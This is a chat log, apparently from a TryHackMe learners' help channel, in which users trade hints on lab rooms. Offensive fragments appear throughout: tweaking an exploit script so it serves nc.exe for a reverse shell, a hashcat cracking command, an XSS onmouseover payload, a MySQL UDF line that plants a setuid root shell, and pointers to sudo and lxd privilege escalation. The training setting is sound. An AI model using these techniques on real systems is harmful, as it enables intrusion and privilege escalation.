How do I change the code of 39161.py so it grabs nc.exe from other ports?
I can't. I'm using the vm from the browser and once I kill the process, the vm disconnects.
in your command specify another port like 81
Thanks! I'm trying to do that. But can't get the 39161.py file to grab from the port. Do you have any idea how I can change it so that it works?
Gave +1 Rep to @real geode
the second parameter is the port, you need to put the correct port (like 81 if you use it in your python -m ...)
Are you referring to the local_port parameter in my previous screenshot? That is actually to tell nc.exe (the netcat binary for that task) which port to connect to so that we can get the reverse shell. I believe this is the part where the script is trying to get the nc.exe file from my machine. Do you know how I can state the port here? I tried adding ":portnumber" behind the +ip_addr+ but it said there was a syntax error.
So sorry, still don't get it. Can you explain a little more?
ip_addr+":port%2F....."
Ohhh, thanks! I will go try it out.
Gave +1 Rep to @stuck fractal
Morning - Quick Question please - When saving a private id_rsa key what file format do i save it as?
You don't?
I would have thought .pem but the ssh server is returning invalid file format
File extensions are meaningless outside of windows pretty much
Is this for a tryhackme room?
its the LFI room
Ok. You don't save it with any extension.
Make sure there aren't any spaces in weird places. Make sure there is a single blank line at the end.
Invalid file format or invalid format?
!docs verify
Follow those steps and then you can post images
its says - key invalid format
I can't wait till they invent printscreen
i couldnt find the shortcut
is there a leading space?
also no single blank line at the end like James mentioned
ok ill try that thanks
all spaces look ok
There's a space at the start where there shouldn't be, in that image
and we also can't tell if there are trailing spaces etc
thanks gents, issue solved. there was a space at the end
I figured out thanks
Gave +1 Rep to @remote gate
i m doing room cooctus stories
when i compare both the commits inside of plain text i get this
im stuck on year of the rabbit i got eli's ssh password but don't know how to switch to gwendoline any hints.
np i got what i was looking for
how would you guys exploit this shit
Do it in two steps rather than one
if you are really really stuck you can look at ||CVE-2019-14287||
hints would be good
Hi- could not get a rev shell either- did you find a solution? So far, I can only get a shell when using THM Attack box- suspect a python script issue
you need to run the full command
Eh there's another step to it that's important
i got it from here thanks for input https://www.bleepingcomputer.com/news/linux/linux-sudo-bug-lets-you-run-commands-as-root-most-installs-unaffected/
Gave +1 Rep to @pure thistle
right now im stuck on another box lol
how do i crack this ??
Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.
Salt: aReallyHardSalt
dictionary attack.
hashcat -m 1800 hash2.3 /usr/share/wordlists/rockyou.txt
cat hash2.3
$6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02:aReallyHardSalt
i did
Please don't ask the same question over multiple channels @split breach
Ok
what happened
@white salmon ninja is helping me out in #room-help you can come over there
What does the test" do in: test" onmouseover="alert('Hover over the image and inspect the image element')"
closes the quotes
interesting
you can probably exchange that for anything
Yeah, I saw that
I even removed it
still works
so is "onmouseover" a specific command?
yes, it activates when your mouse pointer goes over the element
The keyword is an attribute
It belongs to the element
oh, so that's the vulnerable attribute in the js code?
not necessarily, just a way to activate it
interesting
there's so much to learn
I need to understand why certain things are happening
Hey everyone! I'm trying to gain root access to the GamingServer box with no success. I don't know the user's password because I got access using their id_rsa key. I've searched for suid files and ran linpeas.sh locally and nothing really caught my eye that would help me escalate my privileges. I'm thinking I overlooked something, or that there's a 'deployment system' somewhere to be picked at, but I don't know what that is. Any hints as to where to look to progress further?
I haven't done that room, but other things to potentially look for are services running on the machine, local ports being used. If linpeas didn't give you anything useful, then that rules out a lot of the easy things. Is there perhaps some other service or port running on the machine that you can do something with?
in terms of services running on open ports, no. only the webserver and ssh. The apache config files didn't have anything useful for us I believe. the user has stuff in their /home/.config files (a subfolder named lxc), but I can't tell if it's important or not
link the room?
ah. Yeah, that doesn't give a lot of hints to work with
supposed to be a 'game server' box but idk what software or binaries would be related to that.
oh well, thanks anyways. I'll look at it again tomorrow, gotta eat 🙂
it's strange because getting initial access was a breeze
maybe try replacing one of the services the game server uses?
Do a strings on the binaries that are running, see if you can restart them?
look at user's groups use the id command
I did check and lxd was peculiar (it's also highlighted by linpeas), and a quick look online reveals that it's related to linux containers and whatnot. Is this the lead?
yes google lxd exploit
Ok thanks I'll do that after a snack. Everyone stay hydrated!
haha How can we tell when/that "this is it" though, there are so many things to learn
lol once you do the lxd exploit the next box you do that has a user in the lxd group you will probably start with that exploit first i know i do
as for how do you know when "this is it", I'd say: anything that gets you any kind of escalation or new information.
i.e.: when it works
Thank you both @worn otter and @pure thistle , I got the flag. It's a pretty nice trick indeed
Gave +1 Rep to @worn otter
I know right now whenever you see a user in the lxd group go for it 😆
I wrote a script which gets you root if you have a lxd on box
cool👍
Nice nice
Need a hint, I'm on Linux Fundamentals Q7, finding shiba4 password. The bin is supposed to check if I have directory test in my home directory, and file test1234 in directory test... Need a nudge in the right direction from what I have so far
Oh hmm
I come up with nothing when running find / shiba4
I'm just stuck with the find command
Yep, that syntax isn't quite right
At the moment you're saying list all files in / and all files in shiba4
Any hints for Room Ignite, root flag? I ran linpeas but couldnt find anything I could exploit
|| I thought it might be one of the SUID binaries like pkexec or pppd|| but couldnt exploit that as well
What do you typically do first when gaining a shell through a web application?
hello, ive just been going through the linux basics rooms. Im stuck at task 14 of room 2. can anybody help?
It's always best to directly ask your question
Someone can't know if they can help unless they know the problem
its about chown
How would you change the owner of file to paradox
is the question
but i dont really get chown yet
it is no longer necessary to put "#!" at the beginning to make a bash script?
I ask this because I was able to run a script without initially adding "#!/bin/bash"
Is this for a specific tryhackme room?
It sounds like it's generic.
Please use #infosec-general for generic questions that aren't room related.
oh ook sorry
Hi there, I hope somebody has a tip for me on what to do here.
I am busy with network services (SMB) right now. I am supposed to find the contents of a file but I spent the last 30minutes struggling with it. Any ideas?
i have tried using open , get among other commands in the smb shell to try and get something
I get an error that reads NT_STATUS_OBJECT_NAME_NOT_FOUND
Heya, could you provide some more information like a screenshot of what you tried? In order to send screenshots you need to verify
!docs verify
Oof. Sorry I neglected to verify
I am going to try again a bit later then I will share screenshots. Thanks for reaching out though
thanks for the hint. I will try to decode it 😛
Gave +1 Rep to @narrow wren
Got the flag! I thought I had tried what I did earlier but hadnt. Thanks
room nmap, task 8, second quest
I understand that this scan is more stealthy and circumvents some firewalls, but I can't identify the specific answer he wants, any tips?
damn, very specific kkkkkk thank you
hi guys
Can you please advise how may I follow up on this one?
I got the file and was able to do the changemod but I have no clue how I should work out uid and pw
Use the key to log in via SSH. Get the flag
You don't need the password because you're authenticating with the key
am I still suppose to do this part from terminal? ( i have only used 'ssh uid@ip' so far )
will try to look up, thank you
That's a good start but you need to use the key
has anyone been able to figure out how to find the answer to the security question in the OWASP Juice shop room "Your mother's maiden name?"
What exact answer is required here?
I have almost checked every nmap option but Service is unknown
found nothing else which can be referred as 'title'
did you use -A with nmap?
the non standard port mentioned in the previous question definitely has a title that will lead to that answer
you are right, maybe I missed that 🤦‍♂️
thank you
Having issues in Task 2 of the LinuxPrivEsc room; while following along at the 5th code block "select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');" I get ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 22 /usr/lib/mysql/plugin/raptor_udf2.so: file too short).
so that's the shebang you're talking about, so if you want to make your program executable (chmod +s [program]), your terminal will need a way to tell what program it is actually trying to run it with
so the shebang specifies that it should be run in bash (to the best of my understanding)
you'll still be able to run the program like bash [program] regardless of the shebang, so it's not necessary
however, I think modern day terminals are pretty good at taking a good guess with which program they should run your script with
Hello im in the Who's flying this thing in the OWASP Juice shop, and i cant get the answer after i changed the Get /rest/basket/1 from 1 til 2 ? am i missing out on something? i have tried 3 users now
can anyone help me 🙂
Hi Can someone please advise what am I doing wrong at Network services room (telnet second task)?
First word of your generated payload
🤦‍♂️
thank you
I must get used to getting a lot of error, and missing reports + errors and still getting an answer
~/.ssh/id_rsa
For RSA keys at least
There's other key types like dsa or EC crypto
I'm stuck on task 4 ZTH: Obscure web vulns
~/.ssh/id_rsa in the file place
to read private ssh
but its wrong
your answer will work but it's not the correct answer it's not ~/.ssh the answer wants the full path to the private key
Hey
👋 Everything good Khaotic?
I'm working on the room Brainstorm my nmap scan with -p- shows X ports but question expects more, I've ran the scan multiple times to check and always get X ports. I've read some chat history and multiple people get this problem, any idea why?
IIRC it's just Windows being weird and inconsistent
weird, ty @stuck fractal
Gave +1 Rep to @stuck fractal
noob question: I'm in the Nmap room and the question is having me perform an xmas scan on the first 99 ports on the machine, but nmap is telling me that the host is not up, the command i'm running is 'sudo nmap -sX -p 1-999 10.10.xxx.xxx' any idea what i'm doing wrong?
You need an extra flag because it doesn't respond to pings
ahh ok
Nmap suggests it for you.
yes I did find out it doesn't respond to pings so I must also need to use the -Pn flag
Yep, so you just need to add that to the scan
perfect, seems to be scanning now, waiting results. And this is most likely because the machine has a firewall blocking ICMP packets?
Yep. Windows firewall does by default with THM
noice, ok cool. and these flags don't have to be in any particular order, just as long as they all come before the input
You can put them after the IP, I sometimes do.
Usually when I forget a flag, just adding it on to the end
ok thanks for all the help. Another question. The following question in the room asks me for the reasoning why Nmap stated all 999 ports were open/filtered and this was because of no responses. Given that it doesn't respond to pings, I know it's using a firewall to block ICMP packets, and given that there are no responses, this means that the firewall is dropping the packets rather than sending an RST?
Thank you
Gave +1 Rep to @stuck fractal
I'm unfortunately stuck again. I ran the TCP SYN scan on the first 5000 ports of the machine using 'sudo nmap -Pn -sS -vv -p 1-5000 10.10.xxx.xxx' - my output says all ports are filtered because of no responses, so I put 0 in my answer when asked how many were shown to be open, and that is incorrect. Any guidance on what I should have done differently?
I think I got my answer running a -A but I don't think that's the point of the exercise
oh nvm i ran it again and it worked, think my vpn disconnected
Some machines take several minutes (or longer) to fully boot up. Not sure if that was the case here.
yeah good, point. However I found for some reason my openvpn session died out. Thank god I noticed not long after, hopefully didn't upset anybody with those port scans I was running
Gave +1 Rep to @worn otter
Could you offer any advice on a room that I'm having trouble with? I'm in the Network Services room and it's asking me to find out which port "SMB" is running on. But my Nmap scan doesn't say, it just tells me the open ports.
-sV
find out which port "SMB" is running on You're a single letter off there. Port(s)
Ninja James is Ninja fast.
ahh thank you James
Gave +1 Rep to @stuck fractal
sorry... still not sure what I'm missing.
I see the open ports, just not sure which ones SMB is running on. this is what I see.
then it just continues to timeout
evening, playing with HoTH#1 and found the 3rd and 4th flag on easy challenge. 2nd flag seems "easy" but i seem to be unable to submit it.
I've tested with back and front ticks but unable to add it. Am i looking at it wrong maybe ? :) (edit for wrong flag)
Op! Found it, the room told me to run -p- which took forever and the scan never finished. I ran -p to scan top 1000 ports and got what I needed. Thanks!
well - seems my characters were flawed. Issue resolved.
has anyone done all machines in the Buffer Overflow OSCP prep? I wanted to know which of the machines or the overflows have a non-standard buffer overflow that doesn't use jmp esp so i can practice that
like using opcode commands or something?
I've completed them all. They are all very much the same but with different register positions. I use the term "register positions" lightly as I am not entirely sure that's the correct terminology but essentially, you're going to find that it is standard buffer overflow from the first one to the last one.
Scan the ports 1-999 and count how many of them are open

